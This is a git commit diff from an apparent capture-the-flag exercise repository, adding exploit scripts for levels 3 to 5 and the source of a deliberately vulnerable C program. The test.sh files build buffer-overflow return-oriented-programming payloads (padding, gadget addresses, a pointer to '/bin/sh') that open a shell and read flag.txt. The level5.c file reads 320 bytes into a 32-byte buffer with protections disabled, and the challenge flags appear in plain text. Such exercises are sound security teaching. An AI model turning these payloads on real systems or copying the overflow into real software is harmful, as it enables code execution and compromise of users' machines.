5
This commit is contained in:
8
4/level3/test.sh
Executable file
8
4/level3/test.sh
Executable file
@@ -0,0 +1,8 @@
|
||||
OLDFLAG="hacklab{w3lc0m3_t0_x86_64_explo1t4t1on_I0vGIviy}"
|
||||
PADDING="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
|
||||
SAVERBP="\x90\xde\xff\xff\xff\x7f\x00\00"
|
||||
GADGET1="\xc3\x12\x40\00\00\00\00\00"
|
||||
CMDADDR="\x08\x20\x40\00\00\00\00\00"
|
||||
CMDCALL="\x96\x11\x40\00\00\00\00\00"
|
||||
|
||||
printf "$OLDFLAG\n$PADDING$SAVERBP$GADGET1$CMDADDR$CMDCALL\ncat flag.txt\n" > input.txt
|
||||
9
4/level4/test.sh
Executable file
9
4/level4/test.sh
Executable file
@@ -0,0 +1,9 @@
|
||||
OLDFLAG="hacklab{n3w_c4ll1ng_c0nv3nt1ons!_wYLVjeJr}"
|
||||
PADDING="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" #32
|
||||
SAVERBP="\x90\xde\xff\xff\xff\x7f\x00\00" #kind of irrelevant
|
||||
GADGET1="\xa4\x12\x40\00\00\00\00\00" #ret (for stack alignment)
|
||||
GADGET2="\xa3\x12\x40\00\00\00\00\00" #pop rdi, ret
|
||||
CMDADDR="\x08\x20\x40\00\00\00\00\00"
|
||||
CMDCALL="\x96\x11\x40\00\00\00\00\00"
|
||||
|
||||
printf "$OLDFLAG\n$PADDING$SAVERBP$GADGET1$GADGET2$CMDADDR$CMDCALL\ncat flag.txt\n" > input.txt
|
||||
1
4/level5/flag.txt
Normal file
1
4/level5/flag.txt
Normal file
@@ -0,0 +1 @@
|
||||
hacklab{thanks_mario_but_the_flag_is_on_another_server}
|
||||
BIN
4/level5/input.txt
Normal file
BIN
4/level5/input.txt
Normal file
Binary file not shown.
BIN
4/level5/level5
Executable file
BIN
4/level5/level5
Executable file
Binary file not shown.
17
4/level5/level5.c
Normal file
17
4/level5/level5.c
Normal file
@@ -0,0 +1,17 @@
|
||||
// gcc -o level5 -no-pie -fno-stack-protector level5.c
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
|
||||
char command[] = "/bin/sh";
|
||||
|
||||
int main(int argc, char **argv) {
|
||||
// Disable output buffering. Not part of the challenge.
|
||||
setvbuf(stdout, NULL, _IONBF, 0);
|
||||
setvbuf(stdin, NULL, _IONBF, 0);
|
||||
|
||||
char buffer[32];
|
||||
puts("What do you want to talk about?");
|
||||
fgets(buffer, 320, stdin);
|
||||
system("echo Bye.");
|
||||
return 0;
|
||||
}
|
||||
15
4/level5/test.sh
Executable file
15
4/level5/test.sh
Executable file
@@ -0,0 +1,15 @@
|
||||
#ROP
|
||||
#0x0000000000401283 : pop rdi ; ret
|
||||
|
||||
#objdump
|
||||
#0000000000404048 g O .data 0000000000000008 command
|
||||
|
||||
OLDFLAG="hacklab{SSE_1n5truct10n5_n33d_spec14l_al1gnm3nt_UwT8mByQ}\n"
|
||||
PADDING="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" #32
|
||||
SAVERBP="\x90\xde\xff\xff\xff\x7f\x00\00" #kind of irrelevant
|
||||
GADGET1="\x84\x12\x40\00\00\00\00\00" #ret (for stack alignment)
|
||||
GADGET2="\x83\x12\x40\00\00\00\00\00" #pop rdi, ret
|
||||
CMDADDR="\x48\x40\x40\00\00\00\00\00"
|
||||
CMDCALL="\x10\x12\x40\00\00\00\00\00"
|
||||
|
||||
printf "$OLDFLAG$PADDING$SAVERBP$GADGET2$CMDADDR$CMDCALL\ncat flag.txt\n"
|
||||
Reference in New Issue
Block a user